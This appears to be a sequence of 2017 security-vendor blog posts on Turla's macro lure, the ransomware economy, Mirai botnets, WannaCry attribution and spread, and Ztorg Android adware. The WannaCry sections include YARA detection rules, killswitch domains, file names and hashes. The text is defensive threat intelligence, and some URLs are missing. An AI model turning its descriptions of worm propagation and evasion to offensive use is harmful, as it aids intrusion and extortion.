The malware is fairly simplistic but flexible in its functionality, running a standard batch of profiling commands on the victim and also allowing the attackers to run arbitrary commands via Wscript.

Full details on KopiLuwak can be found here.

The document contains a malicious macro that’s very similar to macros used previously by Turla to deliver Wipbot, Skipper, and ICEDCOFFEE. The Turla group continues to rely heavily on embedded macros in Office documents. This might seem to be a basic tactic for such a sophisticated attacker, but it has helped them to compromise high-value targets. We would advise organisations to disable macros and not allow employees to enable such content unless it’s absolutely necessary.

The lure document above shows an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs in Cyprus. Based on the name of the document, ‘National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc’, we presumed it may have been sent from the Qatar Ambassador’s secretary to the Ministry of Foreign Affairs, possibly indicating that the Turla group already had control of at least one system within Qatar’s diplomatic network.

The best defence against targeted attacks is a multi-layered approach that combines traditional anti-virus technologies with patch management, host intrusion detection and a default-deny whitelisting strategy. According to a study by the Australian Signals Directorate, 85 per cent of targeted attacks analysed could have been stopped by employing four simple mitigation strategies: application whitelisting, updating applications, updating operating systems and restricting administrative privileges.

Malware stories Stand and deliver: your money or your files!

In eighteenth century Britain (and elsewhere) travellers could be waylaid by a highwayman – a thief who held up coaches on the public highway and demanded that those on board hand over their money and other valuables. The highwayman would typically issue the challenge – ‘Stand and deliver: your money or your life! Ransomware is a version of such highway robbery for the digital age – with the difference that it’s our data that is held hostage and the ‘highwayman’s’ ransom demand is displayed on the screen.

There were more than 1,445,000 ransomware attacks in 2016, on businesses as well as individuals. The huge growth we’ve seen in recent years is fuelled by the success that cybercriminals have had with this type of malware – ransomware is easily monetised and involves a low investment cost per victim.

Out of the 62 new crypto-ransomware families that we discovered last year, at least 47 were developed by Russian-speaking cybercriminals. In February, we published a report on the Russian ransomware economy. It’s clear that the development of ransomware is underpinned by a flexible and user-friendly underground eco-system that allows criminals to launch attack campaigns with almost any level of computer skills and financial resources. Our researchers identified three levels of criminal involvement in the ransomware business.

The first is the creation and update of ransomware families. This requires advanced code-writing skills; and those involved are the most privileged members of the ransomware underground, since they are the key to the whole eco-system. The second is the development and support of affiliate programmes for distributing ransomware. This is done by criminal communities that deliver the ransomware using ancillary tools such as exploit kits and spam. The third is partner participation in such affiliate programmes. Those involved are on the lowest rung of the ladder and their role is to help the owners of affiliate programmes to spread the malware, in return for a cut of the proceeds: the only qualifications required are a willingness to carry out illegal activities and the money to join the affiliate scheme.

We were able to identify several large groups of Russian-speaking criminals specialising in crypto-ransomware development and distribution. These groups might bring together tens of different partners, each with their own affiliate programme. The list of their targets includes not only individual consumers, but small- and medium-sized businesses and even enterprises. While initially targeting organisations in the Russian Federation, these groups are now shifting their attention to companies in other parts of the world. The daily revenue of an affiliate programme might reach tens, or even hundreds, of thousands of dollars: of this, around 60 per cent stays in the pockets of the criminals as net profit.

In March we reported a new ransomware family used in targeted attacks against organizations, named PetrWrap. One they have gained a foothold in the target company, the attackers use the PsExec tool to install ransomware on all computers. One especially interesting aspect of this ransomware is that the attackers use the well-known Petya ransomware to encrypt data. Although Petya makes use of a ‘Ransomware-as-a-Service’ model, the attackers didn’t make use of this facility. Instead, they include a sample of the Petya ransomware inside the data section of the malware and use Petya to infect their victims’ computers. A special module patches the original Petya ransomware ‘on the fly’. This allows the attackers to hide the fact that they are using Petya.

Targeted ransomware attacks on organizations are becoming more common. The groups using ransomware in targeted attacks typically try to find vulnerable servers or servers with unprotected RDP access. After penetrating an organization’s network they use special frameworks such as Mimikatz to obtain the necessary credentials to install ransomware throughout the network. To protect against such attacks, organizations need to keep their server software up-to-date, use secure passwords for remote access systems, install security solutions on their servers and use security solutions with behavioral detection components on all their endpoints.

The Internet of broken Things

You might remember that in October 2016, cybercriminals used a botnet of Internet-connected home devices (such as IP-enabled cameras, DVRs, CCTV cameras and printers) to launch DDoS attack. To do this, the attackers infected vulnerable devices with the Mirai malware. This operation was significant not only because it misused Internet of Things (IoT) devices, but also because the DDoS traffic generated exceeded all previous volumes. The DDoS took down a portion of the Internet and was severe enough to initiate investigations by the FBI and the DHS. At the time, they had not ruled out activity by a nation state, because of the overall power of the Mirai botnets. But even the scale of these attacks didn’t require the work of a nation state. Time will tell if nation states choose to hide their destructive activity in plain sight in the IoT – the capabilities are clearly available. It’s possible that we might see a nation state tempted to take down wide swaths of the Internet using this juvenile toolset.

In February, we looked at reports of a cross-platform Win32-based Mirai spreader and botnet in the wild. Some of the public discussions around this suggested that an entirely new IoT bot is spreading to and from Windows devices. But this is not the case: rather, a previously active Windows botnet is now spreading a Mirai bot variant. We hadn’t seen this spreader variant pushing Mirai downloaders until January. But this Windows bot itself is not new. The Windows bot’s method for distributing Mirai is very limited as well – it only delivers the Mirai bots to a Linux host from a Windows host if it successfully brute-forces a remote telnet connection.

So we haven’t seen a sensational hop from Linux Mirai to Windows Mirai. But we do have a new threat and the use of Windows to spread Mirai to previously unavailable resources. In particular, vulnerable SQL servers running Windows can be a problem, because they can be Internet-facing, and have access to private network connected IP-based cameras, DVR, media center software and other internal devices.

It’s unfortunate to see any sort of Mirai crossover between the Linux and Windows platforms. Just as the release of source code for the Zeus banking Trojan brought years of problems for the online community, the release of Mirai IoT bot source code will also bring major problems to the Internet infrastructure for years to come. This is just the start.

In response to the huge problem this poses to the Internet infrastructure, over the past few months our team and CERT have participated in multiple successful C2 take-down efforts that otherwise have posed problems for partners simply providing notifications. While some security researchers may describe these take-downs as ‘whack a mole’, these efforts resulted in relief from Gbps DDoS storms for major networks. We’re happy to partner with more network operators to use our connections with CERTs, law enforcement agencies and other partners around the world, to build on this success.

You can read our report here.

This attack, like others that involve compromised IoT devices, exploited the fact that many people don’t change the manufacturer’s default credentials when they buy a smart device. This makes it easy for attackers to access the device – they simply have to try the known default password. In addition, there are no firmware updates for many devices. IoT devices are also an attractive target for cybercriminals because they often have 24/7 connectivity.

These days we’re surrounded by smart devices. This includes everyday household such as telephones, televisions, thermostats, refrigerators, baby monitors, fitness bracelets and children’s toys. But it also includes cars, medical devices CCTV cameras and parking meters. Some homes are even designed now with the ‘smartness’ built-in. Ubiquitous Wi-Fi brings all these devices online, as part of the Internet of things (IoT). These things are designed to make our lives easier. Since everyday objects are able to collect and transfer data automatically, without human interaction, they can operate more effectively and efficiently. However, a world of connected everyday objects means a bigger attack surface for cybercriminals. Unless IoT devices are secured, the personal data they exchange can be compromised, they can be subject to an attack, or they can be used in an attack.

One of the problems associated with IoT devices is that they are often everyday objects that have provided useful functions for much longer than the Internet has been around. So we don’t see the computer within the object. Nowhere is this truer than with children’s toys. In the last two years security and privacy concerns around children’s toys have been raised on a number of occasions (you can read more here, here and here).

In February, similar concerns were raised about the My Friend Cayla doll. The Federal Network Agency, the German telecommunications watchdog, suggested that parents that had bought the doll should destroy it because of these worries.

The best advice for anyone using connected/IoT devices at home, is to ensure the default passwords on all devices are changed (using unique, complex passwords) to prevent them being remotely accessed – this includes home routers, which are the gateway to your home network. The temptation may be for people to want to disconnect all devices in light of such news, but in today’s increasingly connected world, that’s not realistic; although it’s always good to review the functionality of a smart device and disable any functions that you don’t actually need. However, good password ‘housekeeping’ goes a long way to keeping cybercriminals away from your devices. This kind of large scale attack also highlights the need for manufacturers to consider security by design, rather as an afterthought.

Data breaches and data dumps

We’ve become accustomed to seeing a steady stream of security breaches month after month; and this quarter has been no exception, including attacks on Barts Health Trust, Sports Direct, Intercontinental Hotels Group and ABTA.

Some breaches result in the theft of sensitive data, highlighting the fact that many companies fail to take adequate steps to defend themselves. Any organisation that holds personal data has a duty of care to secure it effectively. This includes hashing and salting customer passwords and encrypting other sensitive data.

Consumers can limit the damage of a security breach at an online provider by ensuring that they choose passwords that are unique and complex: an ideal password is at least 15 characters long and consists of a mixture of letters, numbers and symbols from the entire keyboard. One alternative is to use a password manager application to handle all this automatically. It’s also a good idea to use two-factor authentication, where an online provider offers this feature – requiring customers to enter a code generated by a hardware token, or one sent to a mobile device, in order to access a site, or at least in order to make changes to account settings.

The public dumping of sensitive information has been gathering pace in recent years. This is a trend that we predicted in 2015. ‘Hacktivists’, criminals and state-sponsored attackers alike have embraced the strategic dumping of private pictures, information, customer lists and code to shame their targets. While some of these attacks are strategically targeted, some are also the product of opportunism, taking advantage of poor cyber-security.

In February, WikiLeaks released more than 8,000 documents, referred to as ‘Vault 7’, that describe tactics and tools used to break into computing devices from leading manufacturers, to circumvent installed security solutions and even lay a trail of false flags. The first batch of documents released (dated between 2013 and 2016) included documentation on how to compromise major browsers, smartphones and computers running Windows, Mac OS and Linux. Subsequent dumps of data focused on the development of malware to compromise firmware running on Mac OS and iOS, especially EFI and UEFI firmware; and on methods to evade detection. You can read more here and here.

We can only expect this practice to continue to grow in the future. Consumers and businesses alike should use encryption to secure sensitive data and should ensure that they apply updates as soon as they become available, to reduce the chances that their data will be stolen and dumped online.

WannaCry and Lazarus Group – the missing link?

Mon, 05/15/2017 - 15:32

Moments ago, Neel Mehta, a researcher at Google posted a mysterious message on Twitter with the #WannaCryptAttribution hashtag:

The cryptic message in fact refers to similarity between samples that have shared code between themselves. The two samples Neel refers to post are:

  • A WannaCry cryptor sample from February 2017 which looks like a very early variant
  • A Lazarus APT group sample from February 2015

The similarity can be observed in the screenshot below, taken between the two samples, with similar code highlighted:

So, what does it all mean?

I know about Wannacry, but what is Lazarus?

We wrote about the Lazarus group extensively and presented together with our colleagues from BAE and SWIFT at the Kaspersky Security Analyst Summit (SAS 2017). See:

Among other things, the Lazarus group was responsible for the Sony Wiper attack, the Bangladesh bank heist and the DarkSeoul operation.

We believe Lazarus is not just “yet another APT actor”. The scale of the Lazarus operations is shocking. The group has been very active since 2011 and was originally disclosed when Novetta published the results of its Operation Blockbuster research. During that research, which we also participated in, hundreds of samples were collected and show that Lazarus is operating a malware factory that produces new samples via multiple independent conveyors.

Is it possible this is a false flag?

In theory anything is possible, considering the 2015 backdoor code might have been copied by the Wannacry sample from February 2017. However, this code appears to have been removed from later versions. The February 2017 sample appears to be a very early variant of the Wannacry encryptor. We believe a theory a false flag although possible, is improbable.

What conclusions can we make?

For now, more research is required into older versions of Wannacry. We believe this might hold the key to solve some of the mysteries around this attack. One thing is for sure — Neel Mehta’s discovery is the most significant clue to date regarding the origins of Wannacry.

Are we sure the early February variant is the precursor to the later attacks?

Yes, it shares the same the list file extension targets for encryption but, in the May 2017 versions, more extensions were added:

> .accdb
> .asm
> .backup
> .bat
> .bz2
> .cmd
> .der
> .djvu
> .dwg
> .iso
> .onetoc2
> .pfx
> .ps1
> .sldm
> .sldx
> .snt
> .sti
> .svg
> .sxi
> .vbs
> .vcd

They also removed an older extension: “.tar.bz2” and replaced it with just “.bz2”
We strongly believe the February 2017 sample was compiled by the same people, or by people with access to the same sourcecode as the May 2017 Wannacry encryptor used in the May 11th wave of attacks.

So. Now what?

We believe it’s important that researchers around the world investigate these similarities and attempt to discover more facts about the origin of Wannacry. Looking back to the Bangladesh attack, in the early days, there were very few facts linking them to the Lazarus group. In time, more evidence appeared and allowed us, and others, to links them together with high confidence. Further research can be crucial to connecting the dots.

Has anyone else confirmed this?

Yes, Matt Suiche from Comae Technologies confirmed the same similarity based on Neel’s samples:

Can you share the YARA rule used to find this?

Yes, of course. Here you go:

rule lazaruswannacry {


description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta"
date = "2017-05-15"
reference = ""
author = "Costin G. Raiu, Kaspersky Lab"
version = "1.0"
hash = "9c7c7149387a1c79679a87dd1ba755bc"
hash = "ac21c8ad899727137c4b94458d7aa8d8"


51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75
04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01
46 56 E8

03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00
10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00
30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00
38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00
44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00
68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00
FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0
08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0
10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0
2B C0 2C C0 FF FE


((uint16(0) == 0x5A4D)) and (filesize < 15000000) and all of them }

WannaCry FAQ: What you need to know today

Mon, 05/15/2017 - 13:06

Friday May 12th marked the start of the dizzying madness that has been ‘WannaCry’, the largest ransomware infection in history. Defenders have been running around with their heads on fire trying to get ahead of the infection and to understand the malware’s capabilities. In the process, a lot of wires have gotten crossed and we figured it’s time to sit down and set the record straight on what we know, what we wish we knew, and what the near future might hold for us going forward.

In the interest of standing by our stated mission, ‘We’re Here to Save the World’, we’re also sharing IOCs and Yara rules below.

Please remember: Patch, Patch, Patch!

For a refresher on the weekend of madness, please see our original blog.

How did it all start? Was there an e-mail attack vector? Phishing link?

To date, we could not find an e-mail attack vector for Wannacry. We are still investigating leads that suggest compromised sites were used to target some customers. So far, we can confirm that our users are getting attacked using an implementation of the famous EternalBlue exploit leaked by the Shadowbrokers in April. The exploit installs the DarkPulsar backdoor, which is further leveraged to infect a system. Even if the EternalBlue exploit fails in the first place, the attack code still tries to leverage the DarkPulsar backdoor which might have been installed in a previous attack.

Perhaps the main reason why Wannacry was so successful is the fact that the EternalBlue exploit works over the Internet without requiring any user interaction. It works on top of TCP port 445. Last week, our internet facing sensors registered an uptick in port 445 connections on Thursday May 11th, one day before the major outbreak noted on Friday. This means it’s possible the worm was released on Thursday, possibly even late Wednesday evening. The uptick in Port 445 traffic is also confirmed by the SANS DShield project’s graphics.

Port 445 connections per day

I’ve seen conflicting reports about the exploit. Is it targeting SMBv1 or SMBv2?

The vulnerability exploited by the EternalBlue tool lies in the SMBv1 implementation. However, to exploit it, the tool also uses SMBv2. This means that it uses both SMBv1 and SMBv2 packets during the attack. Disabling SMBv1 or SMBv2 prevents the infection; however, while disabling SMBv1 (an old protocol) has no significant impact on modern systems, disabling SMBv2 can cause problems. This is why it is highly recommended to disable SMBv1 for the current attack and for the future.

What is the killswitch? Can we rely on it?

The worm-spreading part of the Wannacry – which is designed to infect other computers — has a special check at the beginning. It tries to connect to a hardcoded website on the Internet and if the connection FAILS, it continues with the attack. If the connection WORKS, it exits. Thus, by registering this domain and pointing it to a sinkhole server, a researcher from the U.K. successfully slowed the spread of the worm.

Can we ultimately rely on this? Well, there has been a lot of speculation about the effectiveness of this killswitch. On the one hand, it does stop further spread of the infection. However, only if the worm is able to connect to the Internet. Many corporate networks have firewalls blocking internet connections unless a proxy is used. For these, the worm will continue to spread in the local network. On the other hand, there is nothing stopping the attackers from releasing a new variant that does not implement a killswitch.

Why did the attackers add a killswitch in the first place?

This is a very good question. Some possible explanations:

  • They were afraid the attack might get out of control and wanted a way to stop the propagation.
  • They coded it as an anti-sandbox check (some sandboxes emulate all internet connections and make them appear to work even if they do not exist)
Has this attack been contained?

We started tracking the attack early today to determine if it’s spiking again. Since 06.00 UTC/GMT Monday 15th May, we observed a sixfold decrease in attacks across our customer base than during the first hours on Friday May 12th.

This suggests infections based on current variants may be under control.

Wait, what do you mean by “current variants”? Is there a second wave of attacks?

Over the weekend two notable variants emerged. Kaspersky Lab does not believe any of these variants were created by the original authors –they were most likely patched by others keen to exploit the attack separately and independently.

The first one started spreading on Sunday morning, at around 02.00 UTC/GMT and was patched to connect to a different domain (ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com). Kaspersky Lab has so far noted three victims for this variant, located in Russia and Brazil.

Code patch from d724d8cc6420f06e8a48752f0da11c66

The second variation that appeared during the weekend appears to have been patched to remove the killswitch. This variant does not appear to be spreading, possibly due to a bug.

Sample MD5 In the wild Killswitch present? Domain killswitch d5dcd28612f4d6ffca0cfeaefd606bcf Yes Yes ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com d724d8cc6420f06e8a48752f0da11c66 No No n/a Does the second wave contain the killswitch?

The d5dcd28612f4d6ffca0cfeaefd606bcf sample distributed on Sunday night (first reports around 02:00am UTC) contains a killswitch domain. This domain (ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com) is only two bytes different from the original:

Sample MD5 Killswitch domain Old iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com New (see above) ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

The second domain was sinkholed by Matt Suiche of Comae Technologies, who reported stopping about 10,000 infections from spreading further:

How much money has been paid by victims so far?

WannaCry Wallet Tracker as of Monday May 15th.

Multiple attempts have been made at tracking transactions to known bitcoin wallets used by WannaCry. The tracker ‘’ has the latest count (at the time of writing) at upwards of 31BTC, or close to $55,000 USD.

What will the attackers do with the money?

An Evil Lair?

We believe it’s unlikely the attackers will be able to do anything with the bitcoins, considering the current high level of interest in this story. Even though the wallet owners are anonymous, the transactions are visible to everybody and can be tracked. Once the bitcoins reach a payment point, where the attackers use them to purchase something in the real world, that payment can be tracked to shipment details, services, or other IPs, effectively, increasing the chances of getting caught.

Does payment guarantee the recovery of files?

We don’t know. Since we are dealing with criminals, there is no reason to expect them to honor the deal, especially in a situation where all the world is closely tracking this campaign and disrupting it as much as possible. Paying the ransom amounts to funding the next wave.

Do not pay the ransom.

How does the worm spread inside a local corporate network?

The malware includes a worm functionality that tries to infect other unpatched Windows machines inside the local network, generating large SMB traffic. Basically it scans LAN IPS for SMB/445 port open. Where it finds any, it delivers the EternalBlue exploit.

Have any other exploits been used?

The only exploit observed so far being used in this campaign is the EternalBlue exploit leaked by Shadow Brokers.

Interestingly, once the malware infects a computer, it runs shellcode to drop and execute its payload. The payload code is available for both 32- and 64-bit systems, runs in ring-0, and seems to be based on the DoublePulsar backdoor leaked by Shadow Brokers in their ‘Lost in Translation‘ blog post .

Can you explain what happens for victims behind a proxy?

The killswitch prevented the main strain of the malware from encrypting the files in the infected computers, basically by checking if a given domain was registered or not. However WannaCry does not check for the presence of any proxy, so it is likely that samples running inside of an organization will not be able to reach the killswitch domain, even if it’s already registered. That means their files will continue to be encrypted.

Who is behind the attack? Is it just one group or multiple groups of attackers?

The attackers didn’t leave many clues about their identities or whereabouts. We are still investigating several possible leads and we’re sharing all relevant information with law enforcement.
At the moment, we haven’t seen any indicators that point towards any known groups. Some early variants of the Wannacry ransomware seem to have been used in March 2017, maybe some as early as February 2017. We are still researching these early variants, scraping them for clues.

Is this primarily targeting Russians?

The spread of the worm does not target a specific geolocation. The distribution is random, selecting IPs from the internet and affected local networks. Nevertheless, a large amount of the infections are in Russia, about 66% of the total attacks we have seen. The skew in distribution is likely due a combination of our increased visibility into Russia as well as a likely prevalence of unpatched systems.

Are you working with law enforcement to help contain this attack?

Yes, we are working with several law enforcement agencies and have provided them with information to help mitigate the attack.

Microsoft is warning against governments stockpiling cyberweapons and called for a Digital Geneva Convention. Will this help?

Kaspersky Lab supports Brad Smith’s call-to-action for governments and industries around the world to take critically important steps to help make a better digital future for all. We strongly believes the world needs an international digital convention and support with the creation of a neutral international cyber organization and firmly supports a pledge from companies to not conduct offensive cyber activities and protect their users from all cyberattacks. For more details please see:

What should I do right now to make sure my organization is protected?

Our recommendations:

  • Install the MS Security Bulletin patches for MS17-010. Please note that Microsoft also released an emergency patch for Windows XP, which is out of support!
  • Disable SMBv1.
  • Backup your data on a regular basis and be sure to store the backups offline.
  • Limit administrative privileges in the network.
  • Segment your network.
  • Make sure all nodes have security software installed and updated.
  • Kaspersky users: make sure System Watcher is enabled and the software updated. System watcher will ensure rollback of any encrypted files.
  • For those who do not use Kaspersky Lab solutions, we suggest installing the free Kaspersky Anti-Ransomware Tool for business (KART).
  • WannaCry is also targeting embedded systems. We recommend ensuring that dedicated security solutions for embedded systems are installed, and that they have both anti-malware protection and Default Deny functionality enabled.
Did Kaspersky block the attack for every target that had the software installed?

Our recent products include a module named System Watcher, which is designed to stop ransomware attacks. It was successful in blocking the damage from Wannacry, proving once again its effectiveness. Additionally, our products include specific detection subroutines which stopped the spreading of the attacks inside local networks. Since Saturday, our products also blocked the network level attacks through IDS components.

I’m running Windows XP – how can I protect myself?

First of all, stop running Windows XP. It is a 16-year-old operating system which is no longer officially supported by Microsoft. We recommend you upgrade to Windows 8.1 or 10. If you absolutely need to run Windows XP, you can download the emergency patch from Microsoft here:

However, prepare for a rough ride ahead, as other vulnerabilities will most likely remain open and leave you vulnerable in the future to other attacks.

Do you have YARA rules and IOCs for everything we know so far?

Multiple YARA rules have been released so far, with varying degrees of accuracy. Florian Roth has published a good Wannacry YARA set on his GitHub. Another set of YARA rules has been published by US-CERT, however, they produce false positives and are not recommended at this time. Our own YARA rules can be found below.

Indicators of Compromise

Network traffic to the following hosts:

  • iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com
  • ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

Filenames on disk:

  • mssecsvc.exe
  • taskdl.exe
  • taskse.exe
  • wannacry.exe
  • tasksche.exe

Hashes for the variants with different kill switches:

  • d5dcd28612f4d6ffca0cfeaefd606bcf
  • d724d8cc6420f06e8a48752f0da11c66

For more malware hashes, please see our previous blogpost.

Yara rules

rule crimeware_Wannacry_worm {


description = "Find Wannacry worm carrier samples"
date = "2017-05-14"
version = "1.0"
author = "Kaspersky Lab"
tlp = "GREEN"


$a0="__TREEID__PLACEHOLDER__" ascii wide fullword
$a1="__USERID__PLACEHOLDER__" ascii wide fullword
$a2="userid" ascii wide fullword
$a3="treeid" ascii wide fullword
$a4="__TREEPATH_REPLACE__" ascii wide fullword
$a5="\\\\%s\\IPC$" ascii wide fullword
$a6="Microsoft Base Cryptographic Provider v1.0" ascii wide fullword
$a7="mssecsvc2.0" ascii wide fullword
$a8="Microsoft Security Center (2.0) Service" ascii wide fullword
$a9="%s -m security" ascii wide fullword
$a10="C:\\%s\\qeriuwjhrf" ascii wide fullword
$a11="tasksche.exe" ascii wide fullword


((uint16(0) == 0x5A4D)) and (filesize < 15000000) and (8 of ($a*)) }
rule crimeware_Wannacry_ransomware {


description = "Find Wannacry ransomware module"
date = "2017-05-14"
version = "1.1"
author = "Kaspersky Lab"
tlp = "GREEN"


//list of extensions targeted by the ransomware module
2E 00 64 00 65 00 72 00 00 00 00 00 2E 00 70 00
66 00 78 00 00 00 00 00 2E 00 6B 00 65 00 79 00
00 00 00 00 2E 00 63 00 72 00 74 00 00 00 00 00
2E 00 63 00 73 00 72 00 00 00 00 00 2E 00 70 00
31 00 32 00 00 00 00 00 2E 00 70 00 65 00 6D 00
00 00 00 00 2E 00 6F 00 64 00 74 00 00 00 00 00
2E 00 6F 00 74 00 74 00 00 00 00 00 2E 00 73 00
78 00 77 00 00 00 00 00 2E 00 73 00 74 00 77 00
00 00 00 00 2E 00 75 00 6F 00 74 00 00 00 00 00
2E 00 33 00 64 00 73 00 00 00 00 00 2E 00 6D 00
61 00 78 00 00 00 00 00 2E 00 33 00 64 00 6D 00
00 00 00 00 2E 00 6F 00 64 00 73 00 00 00 00 00
2E 00 6F 00 74 00 73 00 00 00 00 00 2E 00 73 00
78 00 63 00 00 00 00 00 2E 00 73 00 74 00 63 00
00 00 00 00 2E 00 64 00 69 00 66 00 00 00 00 00
2E 00 73 00 6C 00 6B 00 00 00 00 00 2E 00 77 00
62 00 32 00 00 00 00 00 2E 00 6F 00 64 00 70 00
00 00 00 00 2E 00 6F 00 74 00 70 00 00 00 00 00
2E 00 73 00 78 00 64 00 00 00 00 00 2E 00 73 00
74 00 64 00 00 00 00 00 2E 00 75 00 6F 00 70 00
00 00 00 00 2E 00 6F 00 64 00 67 00 00 00 00 00
2E 00 6F 00 74 00 67 00 00 00 00 00 2E 00 73 00
78 00 6D 00 00 00 00 00 2E 00 6D 00 6D 00 6C 00
00 00 00 00 2E 00 6C 00 61 00 79 00 00 00 00 00
2E 00 6C 00 61 00 79 00 36 00 00 00 2E 00 61 00
73 00 63 00 00 00 00 00 2E 00 73 00 71 00 6C 00
69 00 74 00 65 00 33 00 00 00 00 00 2E 00 73 00
71 00 6C 00 69 00 74 00 65 00 64 00 62 00 00 00
2E 00 73 00 71 00 6C 00 00 00 00 00 2E 00 61 00
63 00 63 00 64 00 62 00 00 00 00 00 2E 00 6D 00
64 00 62 00 00 00 00 00 2E 00 64 00 62 00 00 00
2E 00 64 00 62 00 66 00 00 00 00 00 2E 00 6F 00
64 00 62 00 00 00 00 00 2E 00 66 00 72 00 6D 00
00 00 00 00 2E 00 6D 00 79 00 64 00 00 00 00 00
2E 00 6D 00 79 00 69 00 00 00 00 00 2E 00 69 00
62 00 64 00 00 00 00 00 2E 00 6D 00 64 00 66 00
00 00 00 00 2E 00 6C 00 64 00 66 00 00 00 00 00
2E 00 73 00 6C 00 6E 00 00 00 00 00 2E 00 73 00
75 00 6F 00 00 00 00 00 2E 00 63 00 73 00 00 00
2E 00 63 00 00 00 00 00 2E 00 63 00 70 00 70 00
00 00 00 00 2E 00 70 00 61 00 73 00 00 00 00 00
2E 00 68 00 00 00 00 00 2E 00 61 00 73 00 6D 00
00 00 00 00 2E 00 6A 00 73 00 00 00 2E 00 63 00
6D 00 64 00 00 00 00 00 2E 00 62 00 61 00 74 00
00 00 00 00 2E 00 70 00 73 00 31 00 00 00 00 00
2E 00 76 00 62 00 73 00 00 00 00 00 2E 00 76 00
62 00 00 00 2E 00 70 00 6C 00 00 00 2E 00 64 00
69 00 70 00 00 00 00 00 2E 00 64 00 63 00 68 00
00 00 00 00 2E 00 73 00 63 00 68 00 00 00 00 00
2E 00 62 00 72 00 64 00 00 00 00 00 2E 00 6A 00
73 00 70 00 00 00 00 00 2E 00 70 00 68 00 70 00
00 00 00 00 2E 00 61 00 73 00 70 00 00 00 00 00
2E 00 72 00 62 00 00 00 2E 00 6A 00 61 00 76 00
61 00 00 00 2E 00 6A 00 61 00 72 00 00 00 00 00
2E 00 63 00 6C 00 61 00 73 00 73 00 00 00 00 00
2E 00 73 00 68 00 00 00 2E 00 6D 00 70 00 33 00
00 00 00 00 2E 00 77 00 61 00 76 00 00 00 00 00
2E 00 73 00 77 00 66 00 00 00 00 00 2E 00 66 00
6C 00 61 00 00 00 00 00 2E 00 77 00 6D 00 76 00
00 00 00 00 2E 00 6D 00 70 00 67 00 00 00 00 00
2E 00 76 00 6F 00 62 00 00 00 00 00 2E 00 6D 00
70 00 65 00 67 00 00 00 2E 00 61 00 73 00 66 00
00 00 00 00 2E 00 61 00 76 00 69 00 00 00 00 00
2E 00 6D 00 6F 00 76 00 00 00 00 00 2E 00 6D 00
70 00 34 00 00 00 00 00 2E 00 33 00 67 00 70 00
00 00 00 00 2E 00 6D 00 6B 00 76 00 00 00 00 00
2E 00 33 00 67 00 32 00 00 00 00 00 2E 00 66 00
6C 00 76 00 00 00 00 00 2E 00 77 00 6D 00 61 00
00 00 00 00 2E 00 6D 00 69 00 64 00 00 00 00 00
2E 00 6D 00 33 00 75 00 00 00 00 00 2E 00 6D 00
34 00 75 00 00 00 00 00 2E 00 64 00 6A 00 76 00
75 00 00 00 2E 00 73 00 76 00 67 00 00 00 00 00
2E 00 61 00 69 00 00 00 2E 00 70 00 73 00 64 00
00 00 00 00 2E 00 6E 00 65 00 66 00 00 00 00 00
2E 00 74 00 69 00 66 00 66 00 00 00 2E 00 74 00
69 00 66 00 00 00 00 00 2E 00 63 00 67 00 6D 00
00 00 00 00 2E 00 72 00 61 00 77 00 00 00 00 00
2E 00 67 00 69 00 66 00 00 00 00 00 2E 00 70 00


((uint16(0) == 0x5A4D)) and (filesize < 15000000) and any of them }

Ztorg: money for infecting your smartphone

Mon, 05/15/2017 - 04:57

This research started when we discovered an infected Pokémon GO guide in Google Play. It was there for several weeks and was downloaded more than 500,000 times. We detected the malware as After some searching, I found some other similar infected apps that were being distributed from the Google Play Store. The first of them, called Privacy Lock, was uploaded to Google Play on 15 December 2016. It was one of the most popular Ztorg modifications, with more than 1 million installations.

After I started tracking these infected apps, two things struck me – how rapidly they became popular and the comments in the user review sections.


These infected apps quickly became very popular, gaining thousands of new users each day!

For example, com.fluent.led.compass had 10,000–50,000 installations the day I found and reported it to Google.

However, it still wasn’t deleted from Google Play the next day and the number of installations increased tenfold to 100,000–500,000. It means there were at least 50,000 new infected users in the space of just one day.


There were lots of comments saying that people downloaded these apps for credits/coins/etc.

In some of these comments the users mentioned other apps – Appcoins, Advertapp, etc.

That’s where this latest research work started.

Advertising Apps that pay users

The app mentioned most in the comments was Appcoins, so I installed it. After that, the app prompted me to install some other apps, including one that was malicious, for $0.05.

To be honest, I was surprised that only one was malicious – all the other apps were clean.

The funny thing is that they check for root rights on the device and don’t pay those that have them. And the first thing that Ztorg did on the device after infection started was to get superuser rights.

I contacted the Appcoins developers to try and find out where this malicious advertising offer came from, but they deleted the offer and answered me by saying there was no malware and that they had done nothing wrong.

Then I analyzed the apps installed by infected users and made a list of the most popular ones that paid users to install software:



And of course they offered malware too:

All these offered users 0.04-0.05 USD for installing an app infected with Ztorg from Google Play.


So I decided to take a closer look at these offers and the dumped traffic for these apps.

A typical session in which an advertising app turned into a malicious one was as follows:

  1. App receives offers, including malicious ones, from its server (for example, moneyrewardfun[.]com). Malicious offers are sent from well-known ad services (usually and

  2. After a few redirections from ad service domains (in one case there were 27 redirections) the app goes to or These URLs are related to the ads too.

  3. Then it redirects to

  4. And the final URL that leads to the Google Play Store was

All the offers that I was able to dump had and is a well-known “business intelligence platform”; the URLs that are used in malicious campaigns look like this:

By analyzing these URLs we can identify infected apps on Google Play.

Malicious server

URLs from look like this:|1002009&install_callback=

